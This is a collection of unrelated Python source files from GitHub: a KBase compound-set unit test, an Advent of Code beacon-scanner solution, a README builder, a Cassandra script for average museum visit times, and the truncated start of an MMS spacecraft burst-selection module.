environ.get('KB_AUTH_TOKEN', None)\n config_file = environ.get('KB_DEPLOYMENT_CONFIG', None)\n cls.cfg = {}\n config = ConfigParser()\n config.read(config_file)\n for nameval in config.items('CompoundSetUtils'):\n cls.cfg[nameval[0]] = nameval[1]\n # Getting username from Auth profile for token\n authServiceUrl = cls.cfg['auth-service-url']\n auth_client = _KBaseAuth(authServiceUrl)\n user_id = auth_client.get_user(token)\n # WARNING: don't call any logging methods on the context object,\n # it'll result in a NoneType error\n cls.ctx = MethodContext(None)\n cls.ctx.update({'token': token,\n 'user_id': user_id,\n 'provenance': [\n {'service': 'CompoundSetUtils',\n 'method': 'please_never_use_it_in_production',\n 'method_params': []\n }],\n 'authenticated': 1})\n cls.wsURL = cls.cfg['workspace-url']\n cls.wsClient = workspaceService(cls.wsURL)\n cls.serviceImpl = CompoundSetUtils(cls.cfg)\n cls.scratch = cls.cfg['scratch']\n cls.callback_url = os.environ['SDK_CALLBACK_URL']\n\n cls.dfu = DataFileUtil(cls.callback_url)\n\n @classmethod\n def tearDownClass(cls):\n if hasattr(cls, 'wsId'):\n cls.wsClient.delete_workspace({'id': cls.wsId})\n print('Test workspace was deleted')\n\n def getWsClient(self):\n return self.__class__.wsClient\n\n def getWsId(self):\n if hasattr(self.__class__, 'wsId'):\n return self.__class__.wsId\n suffix = int(time.time() * 1000)\n wsName = \"test_CompoundSetUtils_\" + str(suffix)\n ret = self.getWsClient().create_workspace({'workspace': wsName}) # noqa\n self.__class__.wsId = ret[0]\n return ret[0]\n\n def getImpl(self):\n return self.__class__.serviceImpl\n\n def getContext(self):\n return self.__class__.ctx\n\n @staticmethod\n def fake_staging_download(params):\n scratch = '/kb/module/work/tmp/'\n inpath = params['staging_file_subdir_path']\n shutil.copy('/kb/module/test/'+inpath, scratch+inpath)\n return {'copy_file_path': scratch+inpath}\n\n def save_compound_set(self):\n comp_set = pickle.load(open('/kb/module/test/compound_set.pkl', 'rb'))\n for compound in comp_set['compounds']:\n compound['kb_id'] = compound['id']\n ws_obj = {\"type\": \"KBaseBiochem.CompoundSet\", \"data\": comp_set,\n \"name\": comp_set['name']}\n info = self.getWsClient().save_objects({'id': self.getWsId(),\n \"objects\": [ws_obj]})[0]\n compoundset_ref = \"%s/%s/%s\" % (info[6], info[0], info[4])\n return compoundset_ref\n\n # NOTE: According to Python unittest naming rules test method names should start from 'test'. # noqa\n @patch.object(DataFileUtil, \"download_staging_file\",\n new=fake_staging_download)\n def test_compound_set_from_file_tsv(self):\n params = {'workspace_id': self.getWsId(),\n 'staging_file_path': 'test_compounds.tsv',\n 'compound_set_name': 'tsv_set_1',\n 'mol2_staging_file_path': 'mol2_files_missing_comp.zip'}\n ret = self.getImpl().compound_set_from_file(self.getContext(), params)[0]\n assert ret and ('report_name' in ret)\n\n @patch.object(DataFileUtil, \"download_staging_file\",\n new=fake_staging_download)\n def test_compound_set_from_exported_tsv(self):\n params = {'workspace_id': self.getWsId(),\n 'staging_file_path': 'test_out.tsv',\n 'compound_set_name': 'tsv_set_2'}\n ret = self.getImpl().compound_set_from_file(self.getContext(), params)[0]\n assert ret and ('report_name' in ret)\n\n @patch.object(DataFileUtil, \"download_staging_file\",\n new=fake_staging_download)\n def test_compound_set_from_file_sdf(self):\n params = {'workspace_id': self.getWsId(),\n 'staging_file_path': 'test_compounds.sdf',\n 'compound_set_name': 'sdf_set',\n 'mol2_staging_file_path': 'mol2_files.zip'}\n ret = self.getImpl().compound_set_from_file(self.getContext(), params)[0]\n assert ret and ('report_name' in ret)\n\n @patch.object(DataFileUtil, \"download_staging_file\",\n new=fake_staging_download)\n def test_compound_set_to_file_tsv(self):\n\n params = {'workspace_id': self.getWsId(),\n 'staging_file_path': 'test_compounds.tsv',\n 'compound_set_name': 'tsv_set_3',\n 'mol2_staging_file_path': 'mol2_files.zip'}\n ret = self.getImpl().compound_set_from_file(self.getContext(), params)[0]\n compoundset_ref = ret['compoundset_ref']\n params = {'compound_set_ref': compoundset_ref,\n 'output_format': 'tsv'}\n ret = self.getImpl().compound_set_to_file(self.getContext(), params)[0]\n assert ret and ('file_path' in ret) and ('packed_mol2_files_path' in ret) and ('comp_id_mol2_file_name_map' in ret)\n\n print('compound_set_from_file output\\n{}\\n'.format(ret))\n\n mol2_file_path = ret['packed_mol2_files_path']\n\n mol2_files = zipfile.ZipFile(mol2_file_path).namelist()\n mol2_file_names = [os.path.splitext(os.path.basename(mol2_file))[0] for mol2_file in mol2_files]\n\n w = csv.DictReader(open('test_compounds.tsv'), dialect='excel-tab')\n\n comp_ids = []\n for line in w:\n comp_ids.append(line.get('id'))\n\n self.assertCountEqual(mol2_file_names, comp_ids)\n\n @patch.object(DataFileUtil, \"download_staging_file\",\n new=fake_staging_download)\n def test_mol2_files_to_pdbqt(self):\n\n params = {'workspace_id': self.getWsId(),\n 'staging_file_path': 'test_compounds.tsv',\n 'compound_set_name': 'tsv_set_4',\n 'mol2_staging_file_path': 'mol2_files_missing_comp.zip'}\n ret = self.getImpl().compound_set_from_file(self.getContext(), params)[0]\n params = {'input_ref': ret['compoundset_ref']}\n ret = self.getImpl().convert_compoundset_mol2_files_to_pdbqt(self.getContext(), params)[0]\n assert ret and ('packed_pdbqt_files_path' in ret) and ('comp_id_pdbqt_file_name_map' in ret)\n\n pdbqt_file_path = ret['packed_pdbqt_files_path']\n\n pdbqt_files = zipfile.ZipFile(pdbqt_file_path).namelist()\n pdbqt_file_names = [os.path.splitext(os.path.basename(pdbqt_file))[0] for pdbqt_file in pdbqt_files]\n\n w = csv.DictReader(open('test_compounds.tsv'), dialect='excel-tab')\n\n comp_ids = []\n for line in w:\n comp_ids.append(line.get('id'))\n\n print('test_mol2_files_to_pdbqt')\n print(comp_ids)\n print(pdbqt_files)\n\n for pdbqt_file in pdbqt_files:\n self.assertTrue(os.path.getsize(pdbqt_file_path) > 0)\n\n # self.assertEqual(len(comp_ids) - 1, len(pdbqt_file_names))\n self.assertTrue(set(pdbqt_file_names).issubset(comp_ids))\n\n def test_compound_set_to_file_sdf(self):\n compoundset_ref = self.save_compound_set()\n params = {'compound_set_ref': compoundset_ref,\n 'output_format': 'sdf'}\n ret = self.getImpl().compound_set_to_file(self.getContext(), params)[0]\n assert ret and ('file_path' in ret)\n\n def test_compound_set_to_file_mol(self):\n compoundset_ref = self.save_compound_set()\n params = {'compound_set_ref': compoundset_ref,\n 'output_format': 'mol'}\n ret = self.getImpl().compound_set_to_file(self.getContext(), params)[0]\n assert ret and ('file_path' in ret)\n\n def test_compound_set_to_file_pdb(self):\n compoundset_ref = self.save_compound_set()\n params = {'compound_set_ref': compoundset_ref,\n 'output_format': 'pdb'}\n ret = self.getImpl().compound_set_to_file(self.getContext(), params)[0]\n assert ret and ('file_path' in ret)\n\n def test_compound_set_to_file_bad_input(self):\n compoundset_ref = self.save_compound_set()\n with self.assertRaisesRegex(ValueError, 'parameter is required'):\n self.getImpl().compound_set_to_file(self.getContext(),\n {'compound_set_ref': compoundset_ref})\n\n with self.assertRaisesRegex(ValueError, 'parameter is required'):\n self.getImpl().compound_set_to_file(self.getContext(),\n {'output_format': 'pdb'})\n\n def test_compound_set_from_model(self):\n model = json.load(open('/kb/module/test/iMR1_799.json'))\n ws_obj = {\"type\": \"KBaseFBA.FBAModel\", \"data\": model,\n \"name\": model['name']}\n info = self.getWsClient().save_objects({'id': self.getWsId(),\n \"objects\": [ws_obj]})[0]\n model_ref = \"%s/%s/%s\" % (info[6], info[0], info[4])\n params = {'workspace_id': self.getWsId(),\n 'model_ref': model_ref,\n 'compound_set_name': 'model_set'}\n ret = self.getImpl().compound_set_from_model(self.getContext(), params)[0]\n assert ret and ('report_name' in ret)\n\n def test_compound_set_export(self):\n compoundset_ref = self.save_compound_set()\n ret1 = self.getImpl().export_compoundset_as_tsv(\n self.getContext(), {'input_ref': compoundset_ref})[0]['shock_id']\n assert ret1 and ret1.count('-') == 4\n ret2 = self.getImpl().export_compoundset_as_sdf(\n self.getContext(), {'input_ref': compoundset_ref})[0]['shock_id']\n assert ret2 and ret2.count('-') == 4\n\n @patch.object(DataFileUtil, \"download_staging_file\",\n new=fake_staging_download)\n def test_mol2_export(self):\n params = {'workspace_id': self.getWsId(),\n 'staging_file_path': 'test_compounds.tsv',\n 'compound_set_name': 'tsv_set_5',\n 'mol2_staging_file_path': 'mol2_files.zip'}\n ret = self.getImpl().compound_set_from_file(self.getContext(), params)[0]\n\n mol2_file = self.getImpl().export_compoundset_mol2_files(\n self.getContext(),\n {'input_ref': ret['compoundset_ref']})[0]['packed_mol2_files_path']\n\n mol2_files = zipfile.ZipFile(mol2_file).namelist()\n mol2_file_names = [os.path.splitext(os.path.basename(mol2_file))[0] for mol2_file in mol2_files]\n\n w = csv.DictReader(open('test_compounds.tsv'), dialect='excel-tab')\n\n comp_ids = []\n for line in w:\n comp_ids.append(line.get('id'))\n\n self.assertCountEqual(mol2_file_names, comp_ids)\n\n @patch.object(DataFileUtil, \"download_staging_file\",\n new=fake_staging_download)\n def test_fetch_mol2_from_zinc(self):\n params = {'workspace_id': self.getWsId(),\n 'staging_file_path': 'test_compounds.tsv',\n 'compound_set_name': 'tsv_set_6'}\n ret = self.getImpl().compound_set_from_file(self.getContext(), params)[0]\n compoundset_ref = ret['compoundset_ref']\n\n compoundset = self.dfu.get_objects(\n {'object_refs': [compoundset_ref]})['data'][0]['data']\n hids = [comp.get('mol2_handle_ref') for comp in compoundset['compounds']]\n\n self.assertCountEqual(hids, [None]*9)\n\n params = {'workspace_id': self.getWsId(),\n 'compoundset_ref': compoundset_ref}\n new_compoundset_ref = self.getImpl().fetch_mol2_files_from_zinc(\n self.getContext(), params)[0]['compoundset_ref']\n new_compoundset = self.dfu.get_objects(\n {'object_refs': [new_compoundset_ref]})['data'][0]['data']\n new_hids = [comp.get('mol2_handle_ref') for comp in new_compoundset['compounds']]\n\n self.assertTrue(new_hids.count(None) < 9)\n","repo_name":"kbaseapps/CompoundSetUtils","sub_path":"test/CompoundSetUtils_server_test.py","file_name":"CompoundSetUtils_server_test.py","file_ext":"py","file_size_in_byte":12866,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"1377205500","text":"#!/usr/bin/env python3\n\nimport sys\nfrom itertools import combinations\n\n# parse input\nscanners = []\nscanner = []\nfor line in open(sys.argv[1]):\n line = line.rstrip()\n if '--- scanner' in line:\n # not first line\n if scanner and len(scanner) > 0:\n scanners.append(scanner)\n scanner = []\n elif len(line) > 0:\n x, y, z = map(int, line.split(','))\n scanner.append((x, y, z))\nscanners.append(scanner)\n\ndistances = []\n\n# --- ok, I didn't figure out the orientation stuff, so\n# I peeked at my son's solution. Sorry. But it is allowed\n# to peek after a large number of hours of trying.\n\ndef sub(a, b):\n l = []\n for x, y in zip(a, b):\n l.append(x - y)\n return tuple(l)\n\ndef add(a, b):\n l = []\n for x, y in zip(a, b):\n l.append(x + y)\n return tuple(l)\n\n# return dict of all differences for all coords\ndef diffs(coords):\n d = dict()\n for p in coords:\n l = list()\n for q in coords:\n l.append(sub(p, q))\n d[p] = l\n return d\n\n# return one of 24 possible orientations\ndef orientexpress(p, i):\n x, y, z = p\n return (\n (+x, +y, +z), (+y, +z, +x), (+z, +x, + y), (+z, +y, -x), (+y, +x, -z), (+x, +z, -y),\n (+x, -y, -z), (+y, -z, -x), (+z, -x, - y), (+z, -y, +x), (+y, -x, +z), (+x, -z, +y),\n (-x, +y, -z), (-y, +z, -x), (-z, +x, - y), (-z, +y, +x), (-y, +x, +z), (-x, +z, +y),\n (-x, -y, +z), (-y, -z, +x), (-z, -x, + y), (-z, -y, -x), (-y, -x, -z), (-x, -z, -y)\n )[i]\n\n# return list of lists of all orientations\ndef all_orientations(points):\n ao = []\n for i in range(24):\n ol = []\n for x in points:\n ol.append(orientexpress(x, i))\n ao.append(ol)\n return ao\n\ndef find_offset(coords0, coords2):\n diff1 = diffs(coords0)\n for orientation in all_orientations(coords2):\n diff2 = diffs(orientation)\n # k1: diffs of all points from k1\n for k1, v1 in diff1.items():\n # k2: diffs of all points from k2\n for k2, v2 in diff2.items():\n if len(set(v1) & set(v2)) >= 12:\n return (sub(k1, k2), orientation)\n return False\n\ndef new_absolute(absolute, coords):\n diff, coords2 = find_offset(absolute, coords)\n for p in coords2:\n np = add(p, diff)\n # no duplicates\n if not np in absolute:\n absolute.append(np)\n return absolute\n\n\n# Convert all points to relative scanner 0\ndef relative_scanner0(absolute, remaining):\n global distances\n\n while True:\n # This takes time, print progress\n print(len(remaining))\n\n if len(remaining) == 0:\n # done, all converted to absolute\n return absolute\n\n for r in remaining:\n offset = find_offset(absolute, r)\n if offset:\n distances.append(offset[0])\n absolute = new_absolute(absolute, r)\n remaining.remove(r)\n break\n\n# main\n\nabsolute = scanners[0]\nremaining = scanners[1:]\n\nl = relative_scanner0(absolute, remaining)\n\n# Sort, to compare with task example output\n#l = sorted(l)\n#print(l)\nprint('part 1:', len(l))\n\ndef manhattan(o1, o2):\n l = []\n for x1, x2 in zip(o1, o2):\n l.append(abs(x1 - x2))\n #print(o1, o2, sum(l))\n return sum(l)\n\nmanhattans = []\nfor o1, o2 in combinations(distances, 2):\n manhattans.append(manhattan(o1, o2))\nprint('part 2:', max(manhattans))\n","repo_name":"AlbertVeli/AdventOfCode","sub_path":"2021/19/day19.py","file_name":"day19.py","file_ext":"py","file_size_in_byte":3450,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"75007086828","text":"#构建 README.md\nimport os\n\nlines = ['# 个人所有博客内容同步更新\\n\\n\\n',]\n\nblogs = {}\n\ndef doAllFile(path, parent):\n\tfl = os.listdir(path)\n\tfor tempP in fl :\n\t\tcpath = os.path.join(path, tempP)\n\t\tif os.path.isdir(cpath) and not tempP.find('.') == 0:\n\t\t\tparent[tempP] = {}\n\t\t\tdoAllFile(cpath, parent[tempP])\n\t\telif os.path.isfile(cpath) and tempP.find('README') == -1 and os.path.splitext(tempP)[1] == \".md\" :\n\t\t\tparent[\"files\"] = parent.get(\"files\", [])\n\t\t\tparent[\"files\"].append(os.path.splitext(tempP)[0])\n\t\ndoAllFile(\"./\", blogs)\n\ndef parseBlog(values, depth, root):\n\tif \"files\" in values :\n\t\tfor one in values[\"files\"] :\n\t\t\tlines.append('* [{}]({}{}.md) \\n'.format(one, root, one))\n\t\tdel values[\"files\"]\n\tfor path, item in values.items():\n\t\tif item:\n\t\t\tlines.append('\\n' + '#' * depth + ' ' + path + ' \\n\\n')\n\t\t\tparseBlog(item, depth + 1, root + path + \"/\")\n\nparseBlog(blogs, 3, \"https://github.com/bluefeng/blog/blob/master/\")\n\n\nlines.append('\\n转载请注明出处: [http://www.heryc.fun](http://www.heryc.fun) \\n')\n\nwith open('./README.md', 'w') as file:\n\tfile.writelines( lines )\n\n\n","repo_name":"bluefeng/blog","sub_path":"doReadMe.py","file_name":"doReadMe.py","file_ext":"py","file_size_in_byte":1106,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"} +{"seq_id":"70125536426","text":"#TODO: magari prendere i nomi per riempire le mappe con una query, tipo: select distinct poi_name from entrance_by_poi;\n# il problema è che poi dopo la matrice dei tempi sarebbe da aggiornare con le nuove combinazioni (che sono state calcolate a mano)\n\nfrom cassandra.cluster import Cluster\n\nimport uuid\nimport datetime \nimport time\n\nstartTime = time.time()\n\ncluster = Cluster(protocol_version = 3)\nsession = cluster.connect('vrcard')\n\n\n#mappa nome-indice\nnameIndexDict = {\n \"Centro Fotografia\": 0,\n \"Santa Anastasia\": 1,\n \"Museo Storia\": 2,\n \"Torre Lamberti\": 3,\n \"Arena\": 4,\n \"Palazzo della Ragione\": 5,\n \"Giardino Giusti\": 6,\n \"Sighseeing\": 7,\n \"Museo Conte\": 8,\n \"Castelvecchio\": 9,\n \"San Zeno\": 10,\n \"Museo Lapidario\": 11,\n \"Tomba Giulietta\": 12,\n \"Museo Radio\": 13,\n \"Duomo\": 14,\n \"San Fermo\": 15,\n \"Casa Giulietta\": 16,\n \"AMO\": 17,\n \"Teatro Romano\": 18,\n \"Museo Africano\": 19,\n \"Verona Tour\": 20,\n \"Museo Miniscalchi\": 21\n}\n\n#dict che tiene le somme\npermanenceTimePOISumDict = {\n \"Centro Fotografia\": 0,\n \"Santa Anastasia\": 0,\n \"Museo Storia\": 0,\n \"Torre Lamberti\": 0,\n \"Arena\": 0,\n \"Palazzo della Ragione\": 0,\n \"Giardino Giusti\": 0,\n \"Sighseeing\": 0,\n \"Museo Conte\": 0,\n \"Castelvecchio\": 0,\n \"San Zeno\": 0,\n \"Museo Lapidario\": 0,\n \"Tomba Giulietta\": 0,\n \"Museo Radio\": 0,\n \"Duomo\": 0,\n \"San Fermo\": 0,\n \"Casa Giulietta\": 0,\n \"AMO\": 0,\n \"Teatro Romano\": 0,\n \"Museo Africano\": 0,\n \"Verona Tour\": 0,\n \"Museo Miniscalchi\": 0\n}\n\n#dict che tiene il count\ncountVisitDict = {\n \"Centro Fotografia\": 0,\n \"Santa Anastasia\": 0,\n \"Museo Storia\": 0,\n \"Torre Lamberti\": 0,\n \"Arena\": 0,\n \"Palazzo della Ragione\": 0,\n \"Giardino Giusti\": 0,\n \"Sighseeing\": 0,\n \"Museo Conte\": 0,\n \"Castelvecchio\": 0,\n \"San Zeno\": 0,\n \"Museo Lapidario\": 0,\n \"Tomba Giulietta\": 0,\n \"Museo Radio\": 0,\n \"Duomo\": 0,\n \"San Fermo\": 0,\n \"Casa Giulietta\": 0,\n \"AMO\": 0,\n \"Teatro Romano\": 0,\n \"Museo Africano\": 0,\n \"Verona Tour\": 0,\n \"Museo Miniscalchi\": 0\n}\n\n#dict che tiene le medie in secondi\navreageStayInSeconds = {\n \"Centro Fotografia\": 0,\n \"Santa Anastasia\": 0,\n \"Museo Storia\": 0,\n \"Torre Lamberti\": 0,\n \"Arena\": 0,\n \"Palazzo della Ragione\": 0,\n \"Giardino Giusti\": 0,\n \"Sighseeing\": 0,\n \"Museo Conte\": 0,\n \"Castelvecchio\": 0,\n \"San Zeno\": 0,\n \"Museo Lapidario\": 0,\n \"Tomba Giulietta\": 0,\n \"Museo Radio\": 0,\n \"Duomo\": 0,\n \"San Fermo\": 0,\n \"Casa Giulietta\": 0,\n \"AMO\": 0,\n \"Teatro Romano\": 0,\n \"Museo Africano\": 0,\n \"Verona Tour\": 0,\n \"Museo Miniscalchi\": 0\n}\n\ncard_serial = ''\n\n# computedStayes, contiene posto e permanenza in secondi\nfor val in session.execute(\"select computeStay(entrances) from grouped_entrances_by_card\"):\n for key in val[0]: #val[0] contiene la mappa\n permanenceTimePOISumDict[key] = permanenceTimePOISumDict[key] + val[0][key] \n countVisitDict[key] = countVisitDict[key] + 1\n \n\nfor key in permanenceTimePOISumDict:\n\n if countVisitDict[key] != 0:\n avreageStayInSeconds[key] = permanenceTimePOISumDict[key] // countVisitDict[key]\n\n print(key, avreageStayInSeconds[key], countVisitDict[key])\n \n\nprint(\"\\n\")\n\nfor key in avreageStayInSeconds:\n print(key, datetime.timedelta(seconds=avreageStayInSeconds[key]))\n\nprint(\"--- %s seconds ---\" % (time.time() - startTime))\n\n\n'''\n 048667C27B3F80 | 2016-10-05 11:38:52.000000+0000 | Castelvecchio | 2016-10-05 | 35 | vrcard2-48\n 048667C27B3F80 | 2016-10-05 12:14:29.000000+0000 | Arena | 2016-10-05 | 25 | vrcard2-48\n 048667C27B3F80 | 2016-10-05 13:07:10.000000+0000 | Santa Anastasia | 2016-10-05 | 29 | vrcard2-48\n 048667C27B3F80 | 2016-10-05 13:32:57.000000+0000 | Duomo | 2016-10-05 | 31 | vrcard2-48\n 048667C27B3F80 | 2016-10-05 14:34:46.000000+0000 | Torre Lamberti | 2016-10-05 | 41 | vrcard2-48\n 048667C27B3F80 | 2016-10-05 15:02:54.000000+0000 | Casa Giulietta | 2016-10-05 | 28 | vrcard2-48\n\n 04D12ABA7B3F80 | 2016-11-19 17:13:06.000000+0000 | Teatro Romano | 2016-11-19 | 24 | vrcard2-48\n 04D12ABA7B3F80 | 2016-11-20 11:55:14.000000+0000 | Castelvecchio | 2016-11-19 | 35 | vrcard2-48\n 04D12ABA7B3F80 | 2016-11-20 13:20:53.000000+0000 | San Zeno | 2016-11-19 | 26 | vrcard2-48\n 04D12ABA7B3F80 | 2016-11-20 15:40:18.000000+0000 | Duomo | 2016-11-19 | 31 | vrcard2-48\n '''","repo_name":"DebbyX3/cassandra-project","sub_path":"2 sol - tutto raggruppato in card/averageTimePerPOIHalfCassandra.py","file_name":"averageTimePerPOIHalfCassandra.py","file_ext":"py","file_size_in_byte":4618,"program_lang":"python","lang":"it","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"13210528946","text":"import os\nimport sys\nimport time_to_orbit as tto\n#os.chdir('/Users/Riley/PycharmProjects/mms_data/mms_sitl_ground_loop');\nrepo_dir = os.getcwd()\n#if not os.path.isfile(os.path.join(repo_dir, 'util.py')):\n# raise ValueError('Could not automatically determine the model root.')\n#if repo_dir not in sys.path:\n# sys.path.append(repo_dir)\n#import util\n#from pymms.sdc import selections as sel\n#from pymms.sdc import mrmms_sdc_api as api\n#from mpl_toolkits.axes_grid1.inset_locator import inset_axes\nimport glob\nimport io\nimport re\nimport requests\nimport csv\n# import pymms\n# from tqdm import tqdm\nfrom cdflib import epochs\nfrom urllib.parse import parse_qs\nimport urllib3\nimport warnings\nfrom scipy.io import readsav\nfrom getpass import getpass\nimport cdflib\nimport datetime as dt\nimport numpy as np\nfrom matplotlib import pyplot as plt\nfrom matplotlib import dates as mdates\nfrom mpl_toolkits.axes_grid1.inset_locator import inset_axes\nimport pathlib\nimport function_folder as ff\noutdir = None\n\ntai_1958 = epochs.CDFepoch.compute_tt2000([1958, 1, 1, 0, 0, 0, 0, 0, 0])\n\n\nclass BurstSegment:\n def __init__(self, tstart, tstop, fom, discussion,\n sourceid=None, createtime=None):\n '''\n Create an object representing a burst data segment.\n\n Parameters\n ----------\n fom : int, float\n Figure of merit given to the selection\n tstart : int, str, `datetime.datetime`\n The start time of the burst segment, given as a `datetime` object,\n a TAI time in seconds since 1 Jan. 1958, or as a string formatted\n as `yyyy-MM-dd hh:mm:SS`. Times are converted to `datetimes`.\n tstop : int, str, `datetime.datetime`\n The stop time of the burst segment, similar to `tstart`.\n discussion : str\n Description of the segment provided by the SITL\n sourceid : str\n Username of the SITL that made the selection\n file : str\n Name of the file containing the selection\n '''\n\n # Convert tstart to datetime\n if isinstance(tstart, str):\n tstart = dt.datetime.strptime(tstart, '%Y-%m-%d %H:%M:%S')\n elif isinstance(tstart, int):\n tstart = self.__class__.tai_to_datetime(tstart)\n\n # Convert tstop to datetime\n if isinstance(tstop, str):\n tstop = dt.datetime.strptime(tstop, '%Y-%m-%d %H:%M:%S')\n elif isinstance(tstop, int):\n tstop = self.__class__.tai_to_datetime(tstop)\n\n self.discussion = discussion\n self.createtime = createtime\n self.fom = fom\n self.sourceid = sourceid\n self.tstart = tstart\n self.tstop = tstop\n\n def __str__(self):\n return ('{0} {1} {2:3.0f} {3}'\n .format(self.tstart, self.tstop, self.fom, self.discussion)\n )\n\n def __repr__(self):\n return ('selections.BurstSegment({0}, {1}, {2:3.0f}, {3})'\n .format(self.tstart, self.tstop, self.fom, self.discussion)\n )\n\n @staticmethod\n def datetime_to_list(t):\n return [t.year, t.month, t.day,\n t.hour, t.minute, t.second,\n t.microsecond // 1000, t.microsecond % 1000, 0\n ]\n\n @classmethod\n def datetime_to_tai(cls, t):\n t_list = cls.datetime_to_list(t)\n return int((epochs.CDFepoch.compute_tt2000(t_list) - tai_1958) // 1e9)\n\n @classmethod\n def tai_to_datetime(cls, t):\n tepoch = epochs.CDFepoch()\n return tepoch.to_datetime(t * int(1e9) + tai_1958)\n\n @property\n def start_time(self):\n return self.tstart.strftime('%Y-%m-%d %H:%M:%S')\n\n @property\n def stop_time(self):\n return self.tstop.strftime('%Y-%m-%d %H:%M:%S')\n\n @property\n def taistarttime(self):\n return self.__class__.datetime_to_tai(self.tstart)\n\n @property\n def taiendtime(self):\n return self.__class__.datetime_to_tai(self.tstop)\n\n\ndef _burst_data_segments_to_burst_segment(data):\n '''\n Turn selections created by `MrMMS_SDC_API.burst_data_segements` and turn\n them into `BurstSegment` instances.\n\n Parameters\n ----------\n data : dict\n Data associated with each burst segment\n\n Returns\n -------\n result : list of `BurstSegment`\n Data converted to `BurstSegment` instances\n '''\n # Look at createtime and finishtime keys to see if either can\n # substitute for a file name time stamp\n\n result = []\n for tstart, tend, fom, discussion, sourceid, createtime, status in \\\n zip(data['tstart'], data['tstop'], data['fom'],\n data['discussion'], data['sourceid'], data['createtime'],\n data['status']\n ):\n segment = BurstSegment(tstart, tend, fom, discussion,\n sourceid=sourceid,\n createtime=createtime)\n segment.status = status\n result.append(segment)\n return result\n\n\ndef _get_selections(type, start, stop,\n sort=False, combine=False, latest=True, unique=False,\n metadata=False, filter=None, case_sensitive=False):\n if latest and unique:\n raise ValueError('latest and unique keywords '\n 'are mutually exclusive.')\n\n # Burst selections can be made multiple times within the orbit.\n # Multiple submissions will be appear as repeated entires with\n # different create times, but only the last submission is the\n # official submission. To ensure that the last submission is\n # returned, look for selections submitted through the following\n # orbit as well.\n orbit_start = time_to_orbit(start)\n orbit_stop = time_to_orbit(stop) + 1\n\n # Get the selections\n data = burst_selections(type, orbit_start, orbit_stop)\n\n # Turn the data into BurstSegments. Adjacent segments returned\n # by `sdc.sitl_selections` have a 0 second gap between stop and\n # start times. Those returned by `sdc.burst_data_segments` are\n # separated by 10 seconds.\n if type in ('abs', 'sitl', 'gls', 'mp-dl-unh'):\n delta_t = 0.0\n converter = _sitl_selections_to_burst_segment\n elif type == 'sitl+back':\n delta_t = 10.0\n converter = _burst_data_segments_to_burst_segment\n else:\n raise ValueError('Invalid selections type {}'.format(type))\n\n # Convert data into BurstSegments\n # If there were no selections made, data will be empty without\n # keys (and throws error in _sitl_selections_to_burst_segment).\n try:\n data = converter(data)\n except KeyError:\n return []\n\n # Get metadata associated with orbit, sroi, and metadata\n if metadata:\n _get_segment_data(data, orbit_start, orbit_stop)\n\n # The official selections are those from the last submission\n # containing selections within the science_roi. Get rid of\n # all submissions except the last.\n if latest:\n data = _latest_segments(data, orbit_start, orbit_stop,\n sitl=(type == 'sitl+back'))\n\n # Get rid of extra selections obtained by changing the\n # start and stop interval\n data = [segment\n for segment in data\n if (segment.tstart >= start) \\\n and (segment.tstop <= stop)]\n\n # Additional handling of data\n if combine:\n combine_segments(data, delta_t)\n if sort:\n data = sort_segments(data)\n if unique:\n data = remove_duplicate_segments(data)\n if filter is not None:\n data = filter_segments(data, filter,\n case_sensitive=case_sensitive)\n\n return data\n\n\ndef _get_segment_data(data, orbit_start, orbit_stop, sc='mms1'):\n '''\n Add metadata associated with the orbit, SROI, and SITL window\n to each burst segment.\n\n Parameters\n ----------\n data : list of BurstSegments\n Burst selections. Selections are altered in-place to\n have new attributes:\n Attribute Description\n ================== ======================\n orbit Orbit number\n orbit_tstart Orbit start time\n orbit_tstop Orbit stop time\n sroi SROI number\n sroi_tstart SROI start time\n sroi_tstop SROI stop time\n sitl_window_tstart SITL window start time\n sitl_window_tstop SITL window stop time\n ================== ======================\n orbit_start, orbit_stop : int or np.integer\n Orbit interval in which selections were made\n sc : str\n Spacecraft identifier\n '''\n idx = 0\n for iorbit in range(orbit_start, orbit_stop + 1):\n # The start and end times of the sub-regions of interest.\n # These are the times in which selections can be made for\n # any given orbit.\n orbit = mission_events('orbit', iorbit, iorbit, sc=sc)\n sroi = mission_events('sroi', iorbit, iorbit, sc=sc)\n window = mission_events('sitl_window', iorbit, iorbit)\n tstart = min(sroi['tstart'])\n tend = max(sroi['tend'])\n\n # Find the burst segments that were selected within the\n # current SROI\n\n while idx < len(data):\n segment = data[idx]\n\n # Filter out selections from the previous orbit(s)\n # Stop when we get to the next orbit\n if segment.tstop < tstart:\n idx += 1\n continue\n if segment.tstart > tend:\n break\n\n # Keep segments from the same submission (create time).\n # If there is a new submission within the orbit, take\n # selections from the new submission and discard those\n # from the old.\n segment.orbit = iorbit\n segment.orbit_tstart = orbit['tstart'][0]\n segment.orbit_tstop = orbit['tend'][0]\n\n sroi_data = _get_sroi_number(sroi, segment.tstart, segment.tstop)\n segment.sroi = sroi_data[0]\n segment.sroi_tstart = sroi_data[1]\n segment.sroi_tstop = sroi_data[2]\n\n # The SITL Window is not defined as of orbit 1098, when\n # a SITL-defined window was implemented\n if iorbit < 1098:\n segment.sitl_window_tstart = window['tstart']\n segment.sitl_window_tstop = window['tend']\n\n idx += 1\n\n\ndef _get_sroi_number(sroi, tstart, tstop):\n '''\n Determine which sub-region of interest (SROI) in which a given\n time interval resides.\n\n Parameters\n ----------\n sroi : dict\n SROI information for a specific orbit\n tstart, tstop : `datetime.datetime`\n Time interval\n\n Returns\n -------\n result : tuple\n The SROI number and start and stop times.\n '''\n sroi_num = 0\n for sroi_tstart, sroi_tstop in zip(sroi['tstart'], sroi['tend']):\n sroi_num += 1\n if (tstart >= sroi_tstart) and (tstop <= sroi_tstop):\n break\n\n return sroi_num, sroi_tstart, sroi_tstop\n\n\ndef _latest_segments(data, orbit_start, orbit_stop, sitl=False):\n '''\n Return the latest burst selections submission from each orbit.\n\n Burst selections can be submitted multiple times but only\n the latest file serves as the official selections file.\n\n For the SITL, the SITL makes selections within the SITL\n window. If data is downlinked after the SITL window closes,\n selections on that data are submitted separately into the\n back structure and should be appended to the last submission\n that took place within the SITL window.\n\n Parameters\n ----------\n data : list of BurstSegments\n Burst segment selections\n orbit_start, orbit_stop : int or np.integer\n Orbits in which selections were made\n sitl : bool\n If 